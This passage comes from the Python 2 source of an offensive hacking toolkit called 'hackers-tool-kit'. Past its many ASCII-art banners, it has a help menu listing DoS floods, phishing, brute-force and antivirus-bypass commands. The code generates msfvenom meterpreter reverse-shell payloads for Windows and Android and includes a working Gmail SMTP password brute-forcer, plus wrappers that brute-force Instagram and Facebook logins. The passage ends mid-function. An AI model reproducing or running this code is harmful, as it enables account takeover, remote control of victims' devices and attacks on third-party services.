░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') -def mainbanner17(): - print """ - - .---. - |---| - type |-\033[32m?\033[0m-| for help - |---| - .---^ - ^---. - :___________: - \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m - ███ ███ | |//| ███ ▄███▀ - ███ ███ | |//| ███▐██▀ - ███▄▄▄▄███ | |//| █████▀ - ███▀▀▀▀███ | |//| █████▄ - ███ ███ | |//| ███▐██▄ - ███ ███ | |.-| ███ ▀███▄ - \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m - \***/ - \*\033[91m/\033[31m - V\033[0m - """.decode('utf-8') -def mainbanner18(): - print """ - Type \033[31m?\033[0m For\033[31m Help\033[0m -\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ -║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ -║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m -║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ -║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ -╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ - """.decode('utf-8') -def mainbanner19(): - print """\033[31m - # # - # # - %# \033[0m@tuf_unkn0wn\033[31m ## - ,%/ /%, - %## ##% - &%## ##%& - ,%%#####/. ,/#####%%, - %&%%#####/ \033[0m████\033[31m /#####%%&% - .&&%%%&& \033[0m████\033[31m &&%%%&&. - /&%( \033[0m████\033[31m (%&( - \033[0m████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ -██ \033[0m██████████████████████████████\033[31m ██ -███████ \033[0m██████████████████████████████\033[31m ███████ -██ ██ \033[0m████ \033[31m ██ ██ - ██████ \033[0m████ \033[31m ██████ - ▒ ▓▒ ▒ ▒ ▓▒ ▒ - ░ ▒ ░ ██████ ░ ▒ ░ - ░ ░ ██ ░ ░ - ███████ - ██ ██ - ██████ - ▒ ▓▒ ▒ - ░ ▒ ░ - ░ ░\033[0m - """.decode('utf-8') -def mainbanner20(): - print """ - - - ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ - ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ -██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ -╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ - ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ - ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ - Created by @tuf_unkn0wn type ? for help - - """.decode('utf-8') -def mainbanner21(): - os.system("cat /root/hackers-tool-kit/tools/venombanner.txt") - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,21) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() - if num == 17: - mainbanner17() - if num == 18: - mainbanner18() - if num == 19: - mainbanner19() - if num == 20: - mainbanner20() - if num == 21: - mainbanner21() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -update : update the hackers-tool-kit -clear : clears screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -nano : open nano text editor -compilec: compile a c file -dnsspoof: dns spoofing [type dnsspoofall to spoof entire subnet] -htk-lite: run a lighter version of hackers-tool-kit -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - print "\033[1m\033[33m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" - k = raw_input("MODE> ") - ma = 'python3 /root/hackers-tool-kit/tools/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or 